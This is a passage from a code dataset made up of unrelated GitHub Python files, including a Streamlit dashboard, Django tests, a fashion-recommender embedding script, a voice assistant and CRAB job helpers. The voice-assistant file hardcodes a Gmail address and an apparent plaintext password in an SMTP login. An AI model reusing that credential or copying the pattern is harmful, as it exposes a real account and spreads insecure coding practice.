set(chain(*[list(cell_dic[nc]['adj']) for nc in next_cells])) & set(d)\n#         return not all_cells\n#\n#     for ch, cells in ds_dic.items():\n#         dist_people = sum(sum(cell_dic[c]['vote']) for c in cells)\n#         if not district_check(cells):\n#             print('wrong district: ', ch)\n#             return False\n#         if dist_people != amount_of_people:\n#             print('wrong people:', ch)\n#             return False\n#\n#     # win check\n#     win, lose = 0, 0\n#     for part in ds_dic.values():\n#         vote_a, vote_b = 0, 0\n#         for p in part:\n#             a, b = cell_dic[p]['vote']\n#             vote_a += a\n#             vote_b += b\n#         win += vote_a > vote_b\n#         lose += vote_a < vote_b\n#\n#     return win > 
lose\n#\n# assert checker(unfair_districts, 5, [\n# [[2, 1], [1, 1], [1, 2]],\n# [[2, 1], [1, 1], [0, 2]]]), '3x2grid'\n#\n# assert checker(unfair_districts, 9, [\n# [[0, 3], [3, 3], [1, 1]],\n# [[1, 2], [1, 0], [1, 1]],\n# [[0, 3], [2, 1], [2, 2]]]), '3x3gid'\n#\n# assert checker(unfair_districts, 8, [\n# [[1, 1], [2, 0], [2, 0], [3, 3]],\n# [[1, 1], [1, 2], [1, 1], [0, 3]],\n# [[1, 1], [1, 1], [1, 2], [0, 3]],\n# [[1, 1], [1, 1], [1, 1], [2, 0]]]), '4x4gid'\n#\n# print('check done')\n","repo_name":"WitalyK/Python_Stepik","sub_path":"checkio.py","file_name":"checkio.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25414122676","text":"import streamlit as st\nfrom data import data\nimport pandas as pd\nfrom util import util\nfrom babel.numbers import format_currency, format_number\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\n\n\ndf = data.getDataFrame(dataset_path='data/order_payments_dataset.csv')\n\nst.title('Analysis Result')\nst.divider()\n\nst.subheader('Payment Type')\n\nwith st.container():\n payment_type_freq = df[['payment_type']].groupby('payment_type')\\\n .value_counts().to_frame(name='freq').sort_values(by=['freq'], ascending=False)\n\n col1, col2 = st.columns(2)\n\n with col1:\n \n st.metric(\n label='Most Used Payment Type',\n value=util.reformatIndexToStr(str(payment_type_freq.index[0]))\n )\n\n with col2:\n\n st.metric(\n label='Payment Frequency',\n value=format_number(\n payment_type_freq.sum()['freq'],\n locale='en_US'\n )\n )\n\n col_colors = ['grey' if(freq < max(payment_type_freq['freq'])) else 'orange' for freq in payment_type_freq['freq']]\n\n fig, ax = plt.subplots()\n\n ax = sns.barplot(\n data=payment_type_freq,\n x='freq',\n y=payment_type_freq.index,\n orient='h',\n palette=col_colors,\n ax=ax\n )\n\n ax.set(\n title='Frequency of Payment Type',\n xlabel='Frequency',\n ylabel='Payment Type'\n )\n\n ax.tick_params(axis='x', rotation=45)\n ax.xaxis.set_major_formatter(ticker.FuncFormatter(lambda x, pos: f'{int(x):,}'))\n\n st.pyplot(fig)\n\n\n\nwith st.container():\n col1, col2 = st.columns(2)\n\n payment_sum_by_type = df.groupby('payment_type').agg(\n payment_sum = pd.NamedAgg(column='payment_value',\n aggfunc='sum')\n ).sort_values(by=['payment_sum'], ascending=False)\n\n with col1:\n \n st.metric(\n label='Most Used Payment Type',\n value=util.reformatIndexToStr(str(payment_sum_by_type.index[0]))\n )\n\n with col2:\n total_payment_str = format_currency(\n payment_sum_by_type.sum()['payment_sum'], \n 'USD', \n locale='en_US'\n )\n\n st.metric(\n label='Total Payment',\n value=total_payment_str\n )\n\n col_colors = ['gray' if(sum < max(payment_sum_by_type['payment_sum'])) else 'orange' for sum in payment_sum_by_type['payment_sum']]\n\n fig, ax = plt.subplots()\n\n sns.barplot(\n data=payment_sum_by_type,\n x='payment_sum',\n y=payment_sum_by_type.index,\n palette=col_colors,\n ax=ax\n )\n\n ax.set(\n title='Total Payment by Payment Type',\n xlabel='Total Payment',\n ylabel='Payment Type'\n )\n\n ax.tick_params(axis='x', rotation=45)\n ax.xaxis.set_major_formatter(ticker.FuncFormatter(lambda x, pos: f'{int(x):,}'))\n\n st.pyplot(fig)\n\nst.divider()\n\nst.subheader('Payment Type Distribution')\nwith st.container():\n installment_and_value_by_type = df.loc[\n :, \n ['payment_installments', 'payment_value', 'payment_type']\n ]\n\n fig, ax = plt.subplots()\n\n sns.scatterplot(\n 
data=installment_and_value_by_type,\n        x='payment_installments',\n        y='payment_value',\n        hue='payment_type',\n        ax=ax\n    )\n\n    ax.set(\n        title='Distribution of Payment Type on Payment Value vs Payment Installment',\n        xlabel='Payment Installment',\n        ylabel='Payment Value'\n    )\n\n    ax.yaxis.set_major_formatter(ticker.FuncFormatter(lambda x, pos: f'{int(x):,}'))\n\n    st.pyplot(fig)\n\n    st.markdown(\n        '''\n        The payment type distribution on payment value vs payment installment shows some interesting information:\n        - The distribution of payments using credit card has positive skewness and the range is from 0 - 24. The payment installments using credit card are centered in 5 - 10.\n        - There's an extreme payment value done using credit card with 1 installment with value 14,000.\n        - The other payment categories lie on the first installment. Among these 4 payment categories, boleto has several transactions with value from 6,000 - ~7,800\n        '''\n    )","repo_name":"Gustana/order_payments_analysis","sub_path":"dashboard/page/analysis_res.py","file_name":"analysis_res.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"28730873926","text":"#!/bin/python\n## This file calculates the cost owed by each person.\n\ndict={}\n#str=\"\"\ndef calc_price_each_person_mobile(arr1) :\n    str=\"\"\n\n    for i in range(len(arr1)) :\n        if arr1[i][:4]!=\"AT&T\" : ## Eliminates Wearable header\n            if arr1[i][0] !=\"$\" : ## Getting only phone number and user name\n                str=str+arr1[i]+\" \" ## creating key for dictionary\n            else :\n                if arr1[i-1][0] !=\"$\" : ## skip the duplicate price line AT&T also displays when a user's price has increased\n                    user_name=str.split(\" \")[1:]\n                    users=\" \".join(user_name).strip()\n                    dict[users]=dict.get((users),0)+float(arr1[i][1:]) ## adding values. Some users can have multiple devices\n                str=\"\"\n    return dict\n\ndef internet_charges_per_person(arr1,insurance) :\n    num_users = int(arr1[2].split(\" \")[0]) ## Getting the number of users\n    #print num_users\n    total_cost_for_internet=float(arr1[3][1:]) ## shared price for users\n    #print total_cost_for_internet\n    internet_charge_per_person=total_cost_for_internet/num_users ## splitting cost for internet\n    insurance_cost_per_person=insurance/num_users ## splitting cost for insurance\n    return internet_charge_per_person+insurance_cost_per_person\n\n\n## Just to round off the values\ndef rounding_values(x):\n    return(round(x+0.001,2))\n\n## Modifying the dictionary mobile_charges\ndef calc_amount_owed(mobile,extra,main_user,insurance) :\n    for i in mobile.keys() :\n        if i == main_user: ## main user is charged for insurance. 
Subtracting the cost from his bill and splitting to everyone.\n            mobile[i]=mobile.get(i)-insurance\n        mobile[i]=mobile.get(i)+extra\n        mobile[i]=rounding_values(mobile.get(i))\n    return mobile ## dictionary with final values\n","repo_name":"abhinavda/att_bill_calculator","sub_path":"calculating_cost.py","file_name":"calculating_cost.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} {"seq_id":"29392990569","text":"import shutil\nimport tempfile\nfrom http import HTTPStatus\n\nfrom ..forms import PostForm\nfrom ..models import Group, Post\nfrom django.conf import settings\nfrom django.test import Client, TestCase, override_settings\nfrom django.urls import reverse\nfrom django.contrib.auth import get_user_model\n\n# Create a temporary directory for media files;\n# the media directory will be overridden for the duration of the test\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\n\nUser = get_user_model()\n\nclass TaskPostFormTest(TestCase):\n    @classmethod\n    def setUpClass(cls):\n        super().setUpClass()\n        cls.author = User.objects.create_user(username='NoName')\n        cls.group = Group.objects.create(\n            title='test_title',\n            description='test_description',\n            slug='test-slug'\n        )\n        cls.post = Post.objects.create(\n            text='test_post',\n            author=cls.author,\n            group=cls.group\n        )\n        # Create a form in case attribute checks are needed\n        cls.form = PostForm()\n\n    @classmethod\n    def tearDownClass(cls):\n        super().tearDownClass()\n\n    def setUp(self):\n        # Create an authorized client\n        self.user = User.objects.create_user(username='User')\n        self.authorized_client = Client()\n        self.authorized_client.force_login(self.author)\n\n    def test_create_post(self):\n        \"\"\"A valid form creates a Post entry.\"\"\"\n        # Count the number of existing Post entries\n        posts_count = Post.objects.count()\n\n        form_data = {\n            'text': 'Тестовый текст',\n            'group': self.group.id,\n        }\n\n        # Send the POST request\n        response = self.authorized_client.post(\n            reverse('posts:post_create'),\n            data=form_data,\n            follow=True\n        )\n\n        self.assertEqual(Post.objects.count(), posts_count + 1)\n        self.assertEqual(response.status_code, HTTPStatus.OK)\n        self.assertTrue(Post.objects.filter(text='Тестовый текст').count())\n\n    def test_edit_post(self):\n        \"\"\"A valid form edits a post.\"\"\"\n        posts_count = Post.objects.count()\n\n        form_data = {\n            'text': 'Отредактированный текст',\n            'group': self.group.id,\n        }\n\n        response = self.authorized_client.post(\n            reverse('posts:post_edit', args=({self.post.id})),\n            data=form_data,\n            follow=True\n        )\n\n        self.assertEqual(response.status_code, HTTPStatus.OK)\n        self.assertRedirects(response, reverse(\"posts:post_detail\", kwargs={\"post_id\": self.post.id}))\n        self.assertEqual(Post.objects.count(), posts_count)\n        self.assertTrue(Post.objects.filter(text='Отредактированный текст').count())\n","repo_name":"kda99/hw03_forms","sub_path":"yatube/posts/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"39852980120","text":"'''\nUnusual units of measure which no doubt are still of some use.\n\nSources:\nhttps://en.wikipedia.org/wiki/List_of_humorous_units_of_measurement\n'''\n\nfrom noether.core import Unit, UnitSet\n\nfrom ..prefixes import SI_all\nfrom ..fundamental import second\nfrom ..scientific import minute, watt_hour, sievert, angstrom, sol\nfrom ..conventional import inch, hour, year\n\n# 
% Length\nbeard_second = Unit(\n angstrom * 100, \"beard_second\",\n info=\"According to popular convention, although the average figure is close to half of this.\")\n\n# % Time\nwarhol = Unit(minute * 15, \"warhol\", prefixes=SI_all,\n info=\"Warhol's \\\"fifteen minutes of fame\\\"\")\nbeard_inch = Unit(inch / (beard_second/second), \"beard_inch\")\n\ndog_year = Unit(\n year / 7, \"dog_year\",\n info=\"This is a very approximate measure and dependent on breed and size\")\n\n# % Energy and radiation\n# https://blog.xkcd.com/2011/03/19/radiation-chart/\nBED = banana_equivalent_dose = Unit(\n sievert * 1e-7, \"banana_equivalent_dose\", \"BED\",\n info=\"c.f. xkcd radiation chart for other useful radiation units\")\nflight_dose_rate = Unit(\n sievert * 4e-9 / hour, \"flight_dose_rate\", \"FED\",\n info=\"Standardised ionizing radiation at 10km cruising altitude\")\n\npirate_ninja = Unit(\n watt_hour * 1000 / sol, \"pirate_ninja\", \"pn\",\n info=\"1 kWh per Martian day, from Andy Weir's The Martian\")\n","repo_name":"yunruse/Noether","sub_path":"noether/catalogue/humorous/unusual.py","file_name":"unusual.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"15807056806","text":"'''\nAuthor: Bappy Ahmed\nEmail: entbappy73@gmail.com\nDate:05-Nov-2021\n'''\n\nfrom src.utils.all_utils import read_yaml, create_directory\nimport argparse\nimport os\nimport logging\nimport pickle\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.layers import GlobalMaxPooling2D\nfrom tensorflow.keras.applications.resnet50 import ResNet50,preprocess_input\nimport numpy as np\nfrom numpy.linalg import norm\nfrom tqdm import tqdm\n\n\n\nlogging_str = \"[%(asctime)s: %(levelname)s: %(module)s]: %(message)s\"\nlog_dir = \"logs\"\nos.makedirs(log_dir, exist_ok=True)\nlogging.basicConfig(filename=os.path.join(log_dir, 'running_logs.log'), level=logging.INFO, format=logging_str,\n filemode=\"a\")\n\n\n\ndef extract_features(img_path,model):\n img = image.load_img(img_path,target_size=(224,224))\n img_array = image.img_to_array(img)\n expanded_img_array = np.expand_dims(img_array, axis=0)\n preprocessed_img = preprocess_input(expanded_img_array)\n result = model.predict(preprocessed_img).flatten()\n normalized_result = result / norm(result)\n\n return normalized_result\n\n\ndef embedding(config_path,params_path):\n \n config = read_yaml(config_path)\n params = read_yaml(params_path)\n\n artifacts = config['artifacts']\n\n artifacts_dir = artifacts['artifacts_dir']\n pickle_format_data_dir = artifacts['pickle_format_data_dir']\n img_pickle_file_name = artifacts['img_pickle_file_name']\n\n feature_extraction_dir = artifacts['feature_extraction_dir']\n extracted_features_name = artifacts['extracted_features_name']\n\n raw_local_dir_path = os.path.join(artifacts_dir, pickle_format_data_dir)\n feature_extraction_path = os.path.join(artifacts_dir, feature_extraction_dir)\n\n create_directory(dirs=[raw_local_dir_path,feature_extraction_path])\n \n pickle_file = os.path.join(raw_local_dir_path, img_pickle_file_name)\n features_name = os.path.join(feature_extraction_path, extracted_features_name)\n\n data_path = params['base']['data_path']\n weight = params['base']['weights']\n include_tops = params['base']['include_top']\n\n\n model = ResNet50(weights= weight,include_top=include_tops,input_shape=(224,224,3))\n model.trainable = False\n\n model = tf.keras.Sequential([\n model,\n 
GlobalMaxPooling2D()\n ])\n\n \n filenames = []\n\n for file in os.listdir(data_path):\n filenames.append(os.path.join(data_path,file))\n\n feature_list = []\n\n for file in tqdm(filenames):\n feature_list.append(extract_features(file,model))\n\n pickle.dump(feature_list,open(features_name,'wb'))\n pickle.dump(filenames,open(pickle_file,'wb'))\n\n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser()\n args.add_argument(\"--config\", \"-c\", default=\"config/config.yaml\")\n args.add_argument(\"--params\", \"-p\", default=\"params.yaml\")\n parsed_args = args.parse_args()\n \n try:\n logging.info(\">>>>> stage_01 started\")\n embedding(config_path = parsed_args.config, params_path= parsed_args.params)\n logging.info(\"stage_01 completed!>>>>>\")\n except Exception as e:\n logging.exception(e)\n raise e\n \n","repo_name":"entbappy/Deep-Learning-Based-Fasion-Recommendation-System","sub_path":"src/01_generate_embedding.py","file_name":"01_generate_embedding.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"34"} +{"seq_id":"74042224418","text":"# https://codingcompetitions.withgoogle.com/kickstart/round/0000000000201b77/0000000000201bfd\n# Use PyPy2 to run it, it does not pass the TLE with Python 3/2\n\ninf = float('inf')\nT = int(input())\nfor t in range(T):\n N, Ts, Tf = map(int,raw_input().split())\n D = [[inf for _ in range(N)] for __ in range(N)]\n for x in range(N-1):\n W, P, V = map(int,raw_input().split())\n if x == 0:\n D[1][0] = W + V\n D[1][1] = max(Ts,W) + (P-(Ts-min(Ts,W))%P)%P + V\n else:\n for y in range(x+2):\n if y == 0: #Ciudad x con vistas 0\n Ac = D[x][0]\n m = max(Ac,W) + (P-(Ac-min(Ac,W))%P)%P + V\n elif y == x+1: #Ciudad x con vistas x\n Ac = D[x][y-1]\n m = max(Ac+Ts,W) + (P-(Ac+Ts-min(Ac+Ts,W))%P)%P + V\n else: #Ciudad x con vistas y\n Al = D[x][y-1]\n l = max(Al+Ts,W) + (P-(Al+Ts-min(Al+Ts,W))%P)%P + V\n \n Ar = D[x][y]\n r = max(Ar,W) + (P-(Ar-min(Ar,W))%P)%P + V\n \n m = min(l,r)\n \n if m <= Tf:\n D[x+1][y] = m\n else:\n break\n \n maxim = -1\n for x in range(N):\n if D[N-1][x] <= Tf:\n maxim = x\n else:\n break\n \n ans = maxim if maxim >= 0 else 'IMPOSSIBLE'\n print('Case #{}: {}'.format(t+1,ans))","repo_name":"Ualabi/Past_Google_Kick_Starts","sub_path":"2017/Round D/1 Sightseeing [Pypy2].py","file_name":"1 Sightseeing [Pypy2].py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"70007043939","text":"list = [1, 2, 11, 2, 5, 3, 5, 1, 3, 3, 11, 8, 7, 6]\n\ncount = 0\nwhile len(list) > 0:\n el = list[0]\n for i in range(len(list)):\n if el == list[i - count]:\n del list[i - count]\n count += 1\n print(f\"Element {el} occurrences - {count}\")\n count = 0\n","repo_name":"unicode368/PythonExercises","sub_path":"day8/count_occurences_with_loops.py","file_name":"count_occurences_with_loops.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15239351007","text":"from importlib import *\nimport pyttsx3\nimport datetime\nimport speech_recognition as sr\nimport wikipedia\nimport webbrowser\nimport os\nimport random\nimport smtplib\nfrom test import *\nimport requests\nfrom bs4 import BeautifulSoup\nimport pyjokes\n\nengine = pyttsx3.init('sapi5')\nrate = engine.getProperty('rate')\nengine.setProperty('rate',200)\nvoices = 
engine.getProperty('voices')\nengine.setProperty('voice',voices[1].id)\n\ndef speak(audio):\n engine.say(audio)\n engine.runAndWait()\ndef wishMe():\n hour = int(datetime.datetime.now().hour)\n if hour>=0 and hour<12:\n speak(\"Good Morning PG\")\n\n elif hour>=12 and hour<18:\n speak(\"Good Afternoon PG\") \n\n else:\n speak(\"Good Evening PG\") \n speak(\"I am Friiday. Please tell me how may I help you\") \n \n \ndef takecommand():\n r=sr.Recognizer()\n with sr.Microphone() as source:\n r.energy_threshold = 1000\n r.adjust_for_ambient_noise(source,1.2)\n r.pause_threshold = 1\n print(\"listening........\")\n audio = r.listen(source)\n try:\n print(\"Recognizing........\")\n query=r.recognize_google(audio,language='en-in')\n print(f\"user said:{query}\\n\")\n except Exception as e:\n print(\"say it again please....\")\n return \"none\"\n return query\n\ndef sendEmail(to,content):\n server=smtplib.SMTP('smtp.gmail.com',587)\n server.ehlo()\n server.starttls()\n server.login('prashikgavali500@gmail.com','Saad@1234')\n server.sendmail('geniusnobita2604@gmail.com',to,content)\n server.close()\n\nif __name__==\"__main__\": \n while True:\n wishMe()\n query = takecommand().lower()\n if 'friday'in query:\n wishMe()\n while True:\n query= takecommand().lower()\n # logic for executing tasks based on query\n if 'wikipedia' in query:\n speak('searching wikipedia')\n query = query.replace('wikipedia',\"\")\n results = wikipedia.summary(query,sentences=2)\n speak('According to wikipedia..')\n print(results)\n speak(results)\n # elif \"temperature\" in query:\n\n elif 'open youtube' in query:\n webbrowser.open('youtube.com')\n if 'close youtube' in query:\n webbrowser.open('youtube.com')\n elif 'open google' in query: \n webbrowser.open('google.com')\n elif 'open stackoverflow' in query:\n webbrowser.open('stackoverflow.com')\n elif 'play music' in query:\n music_dir = 'C:\\\\Users\\\\Hp\\Music'\n songs = os.listdir(music_dir)\n print(songs)\n os.startfile(os.path.join(music_dir,random.choice(songs)))\n elif 'time' in query:\n strTime=datetime.datetime.now().strftime('%H'\"hour\"'%M'\"minutes\"'%S'\"seconds\")\n speak(f\"sir,the time is{strTime}\")\n elif 'joke' in query:\n speak(pyjokes.get_joke())\n elif 'open vs code' in query:\n path=\"C:\\\\Users\\\\Sonu\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\"\n os.startfile(path)\n elif 'open chrome' in query:\n path = \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"\n os.startfile(path)\n elif 'email to ' in query:\n try:\n speak (\"what should i say?\")\n content=takecommand()\n to='geniusnobita2604@gmail.com'\n sendEmail(to,content)\n speak('email has been sent!')\n except Exception as e:\n print(e)\n speak('sorry my friend Prashik. 
i am unable to send this email ')\n elif 'your developer' in query:\n speak(\"PG is my developer.\") \n elif \"what's my name\" in query:\n speak(\"PG\") \n elif 'temperature' in query:\n search='temperature in Kolhapur'\n url=f\"https://www.google.com/search?q={search}\"\n x=requests.get(url)\n data=BeautifulSoup(x.text,'html.parser')\n temp= data.find(\"div\",class_=\"BNeawe\").text\n speak(f\"current {search} is {temp}\")\n elif \"remember that\" in query:\n rememberMessage = query.replace(\"remember that\",\"\")\n rememberMessage = query.replace(\"jarvis\",\"\")\n speak(\"You told me \"+rememberMessage)\n # remember= open(\"Remember.txt\", \"x\")\n remember = open(\"Remember.txt\",\"w+\")\n remember.write(rememberMessage)\n remember.close()\n elif \"what do you remember\" in query:\n remember =open(\"Remember.txt\", \"x\")\n remember = open(\"Remember.txt\",\"r\")\n speak(\"You told me \" + remember.read()) \n elif \"search\" in query and \"google\" in query:\n query = query.replace(\"search\",\"\")\n query = query.replace(\"on google\",\"\")\n query = query.replace(\"google\",\"\")\n string = query.split()\n search = \"\"\n for i in string:\n search += i\n search += \"+\"\n webbrowser.open(f\"https://www.google.com/search?q={search}&oq={search}&aqs=chrome.0.69i59j0i22i30l9.3639j0j15&sourceid=chrome&ie=UTF-8\")\n\n elif \"search\" in query and \"youtube\" in query :\n query = query.replace(\"search\",\"\")\n query = query.replace(\"on youtube\",\"\")\n query = query.replace(\"youtube\",\"\")\n string = query.split()\n search = \"\"\n for i in string:\n search += i\n search += \"+\"\n webbrowser.open(f\"https://www.youtube.com/results?search_query={search}\")\n elif 'goodbye jack' in query:\n speak('thanks for using me have a good day')\n exit(0)\n else:\n print(\"sorry,i unable to answer this task\")\n","repo_name":"prashikGavali/Virtual_Assistant","sub_path":"friday.py","file_name":"friday.py","file_ext":"py","file_size_in_byte":6578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"46842428731","text":"import os\nimport typing\nfrom pathlib import Path\n\n\nfrom .. 
import rules\nfrom .rewrite_ast import ASTRewrite\nfrom .taint.visitor import TaintAnalysis\nfrom .visitor import Visitor\nfrom .nodes import Context\nfrom ...utils import lookup_lines\n\n\nclass ReadOnlyAnalyzer(Visitor):\n hooks = []\n\n def load_tree(self, source: Path):\n if self.tree is None:\n cached = TaintAnalysis.from_cache(source=source, metadata=self.metadata)\n if not cached.traversed:\n cached.traverse()\n\n self.tree = cached.tree\n\n def __call__(self, pth: Path) -> typing.Iterator[rules.Rule]:\n if not self.hooks:\n return\n elif self.kwargs.get('mime') != 'text/x-python' and not os.fspath(self.path).endswith('.py'):\n return\n try:\n self.load_tree(source=pth)\n self.traverse()\n\n for x in self.hooks:\n x.post_analysis(self)\n\n lines = [x.line_no for x in self.hits if x.line_no is not None]\n lines_lookup = lookup_lines(pth, lines)\n for x in self.hits:\n if x.location is None:\n x.location = os.fspath(pth)\n\n if x.line_no in lines_lookup and not x.line:\n x.line = lines_lookup[x.line_no]\n\n yield x\n\n finally:\n for x in self.hooks:\n x.reset_hook()\n\n def _visit_node(self, context:Context):\n node_type = 'node_' + type(context.node).__name__\n\n for hook in self.hooks:\n handler = getattr(hook, node_type, None)\n if handler is not None:\n self.hits.extend(handler(context=context))\n elif hasattr(hook, '_visit_node'):\n self.hits.extend(hook._visit_node(context=context))\n","repo_name":"RootLUG/aura","sub_path":"aura/analyzers/python/readonly.py","file_name":"readonly.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"8818565876","text":"import playsound\nimport random\n\"\"\"Use of Binary Search\"\"\"\nno=random.randint(1,99)\nguesses=10\nprint('\\n')\nprint(\"\\t\\t-------------------------------------------------\")\nprint('\\t\\t|\\tWelcome to Guessing the Number Game\\t|')\nprint('\\t\\t|\\t\\t\\t\\t\\t\\t|')\nprint('\\t\\t|\\t Total {} chances\\t\\t|'.format(guesses))\nprint(\"\\t\\t-------------------------------------------------\")\nprint(\"\\nLet's start by now....start guessing the number :-\\n\")\nprint(\"Hint: Number is less then 100 :-\\n\")\n\ndef howmuch(number,guess):\n if number > guess:\n difference = number - guess\n else:\n difference = guess - number\n return difference\n\ndef winning_music():\n \"\"\"play winning music\"\"\"\n win_music =[\"Sound_tracks/anime_wow.mp3\",\"Sound_tracks/smb_world_clear.mp3\"]\n try:\n playsound.playsound(random.choice(win_music),True)\n except Exception as e:\n print(e) \n\ndef losing_music():\n \"\"\"play losing music\"\"\"\n lose_music = [\"Sound_tracks/Nope.mp3\",\"Sound_tracks/smb_gameover.mp3\"]\n try:\n playsound.playsound(random.choice(lose_music),True)\n except Exception as e:\n print(e) \n\nif __name__ == '__main__':\n \"\"\"initial no of guesses are zero\"\"\"\n chances = 0\n while chances < guesses:\n try:\n guess_num = int(input(\"Guess The Number: \"))\n \"\"\"incrementing number of chances after taking input\"\"\"\n chances += 1 \n except :\n print('\\nPlease enter a number....\\n')\n continue\n \n if guess_num < no:\n if howmuch(no,guess_num) <= 5:\n print(f\"\\nStill smaller, But you are closer to the actual number..keep guessing Good luck! chances left:{guesses-chances}\\n\")\n \n elif howmuch(no,guess_num) >5 and howmuch(no,guess_num) <=10:\n print(f\"\\nBit Smaller, But you are on a right path....keep guessing. 
chances left:{guesses-chances}\\n\")\n\n else:\n print(f'\\nNooo....Guessed Number is less than actual number! Try to get closer.... chances left:{guesses-chances}\\n')\n\n elif guess_num > no:\n if howmuch(no,guess_num) <=5:\n print(f\"\\nStill Higher, But you are closer to the actual number..keep guessing Good luck! chances left:{guesses-chances}\\n\")\n \n elif howmuch(no,guess_num) > 5 and howmuch(no,guess_num) <=10:\n print(f\"\\nBit Higher, But you are on a right path....keep guessing. chances left:{guesses-chances}\\n\")\n\n else:\n print(f'\\nNooo....Guessed Number is greater than actual number! Try to get closer.... chances left:{guesses-chances}\\n')\n\n else:\n print(f\"\\nWoooohoooh....WINNER.... congratulations You took {chances} chances.\\n\")\n winning_music()\n exit(1)\n\n if chances == guesses:\n print(\"Out of chances!\\n\")\n print(\"You are not smarter than me see yaa.....\\n\")\n print('----------------Game Over---------------\\n')\n losing_music()\n exit(1)\n\n \n\n\n\n\n\n","repo_name":"aaaravv/guess-the-number","sub_path":"Guess_the_Number/guesstheno.py","file_name":"guesstheno.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71872851938","text":"# Definition of tools for CRAB job submission.\n# This file is part of https://github.com/hh-italian-group/h-tautau.\nfrom __future__ import print_function\nimport re\nimport sys\nfrom CRABClient.UserUtilities import ClientException\nfrom CRABAPI.RawCommand import crabCommand\nhttplib=__import__('httplib' if sys.version_info.major<3 else 'http.client')\nHTTPException=httplib.HTTPException if sys.version_info.major<3 else httplib.client.HTTPException\n\ndef submit(config, dryrunBool):\n try:\n crabCommand('submit', config = config, dryrun = dryrunBool)\n except HTTPException as hte:\n print(str(hte))\n print(\"\\n{}\\nERROR: failed to submit task due to HTTPException.\\n{}\".format(hte, hte.headers))\n except ClientException as cle:\n print(\"ERROR: failed to submit task due to ClientException.\\n{}\".format(cle))\n\nclass Job:\n def __init__(self, line, jobNameSuffix = ''):\n items = list(filter(lambda s: len(s) != 0, re.split(\" |\\t\", line)))\n n_items = len(items)\n if n_items < 2 or n_items > 3:\n raise RuntimeError(\"invalid job description = '{}'.\".format(line))\n self.jobName = items[0]\n self.requestName = self.jobName + jobNameSuffix\n self.inputDataset = items[1]\n if n_items > 2:\n self.lumiMask = items[2]\n else:\n self.lumiMask = None\n\n\n def __str__(self):\n str = \"requestName = '{}', inputDataset = '{}'\".format(self.requestName, self.inputDataset)\n if self.lumiMask is not None:\n str += \", lumiMask = '{}'\".format(self.lumiMask)\n return str\n\n def submit(self, config, dryrunBool):\n config.General.requestName = self.requestName\n config.Data.inputDataset = self.inputDataset\n if self.lumiMask is not None:\n config.Data.lumiMask = self.lumiMask\n submit(config, dryrunBool)\n\nclass JobCollection:\n def __init__(self, file_name, job_names = '', lumi_mask = '', jobNameSuffix = ''):\n self.jobs = []\n self.jobNames = job_names\n input_file = open(file_name, 'r')\n lines = [ s.strip() for s in input_file.readlines() ]\n lines = list(filter(lambda s: len(s) != 0 and s[0] != '#', lines))\n if len(lines) <= 1:\n raise RuntimeError(\"file '{}' is empty\".format(file_name))\n header_items = list(filter(lambda s: len(s) != 0, re.split(\" |\\n\", lines[0])))\n index_line = 0\n if 
header_items[0].startswith(\"lumiMask\"):\n            index_line = 1\n            lumi = list(filter(lambda s: len(s) != 0, re.split(\"=\", header_items[0])))\n            self.lumiMask = lumi[1]\n        else:\n            self.lumiMask = ''\n        self.pyCfgParams = list(filter(lambda s: len(s) != 0, re.split(\" |\\t\", lines[index_line])))\n\n        if len(header_items) > 0:\n            if header_items[0].lower() == \"signal\":\n                if len(lines) < 4:\n                    raise RuntimeError(\"invalid signal jobs definition in file '{}'\".format(file_name))\n                masses = list(filter(lambda s: len(s) != 0, re.split(\" |\\t\", lines[2])))\n                template = lines[3]\n                for mass in masses:\n                    line = template.format(M = mass)\n                    self.jobs.append(Job(line))\n                return\n        if len(lumi_mask) != 0:\n            self.lumiMask = lumi_mask\n\n        index_sample = 1\n        if header_items[0].startswith(\"lumiMask\"):\n            index_sample = 2\n        for line in lines[index_sample:]:\n            self.jobs.append(Job(line, jobNameSuffix))\n        input_file.close()\n\n    def __str__(self):\n        result = \"cfgParams = {}, lumiMask = '{}'\".format(self.pyCfgParams, self.lumiMask)\n        for job in self.jobs:\n            if len(self.jobNames) == 0 or job.jobName in self.jobNames:\n                result += \"\\n\" + str(job)\n        return result\n\n    def submit(self, config, splitting, unitsPerJob, totalUnits, dryrunBool):\n        config.JobType.pyCfgParams = self.pyCfgParams\n        config.Data.unitsPerJob = unitsPerJob\n        config.Data.splitting = splitting\n        if (totalUnits > 0):\n            config.Data.totalUnits = totalUnits\n\n        for job in self.jobs:\n            if len(self.jobNames) == 0 or job.jobName in self.jobNames:\n                config.Data.lumiMask = self.lumiMask\n                job.submit(config, 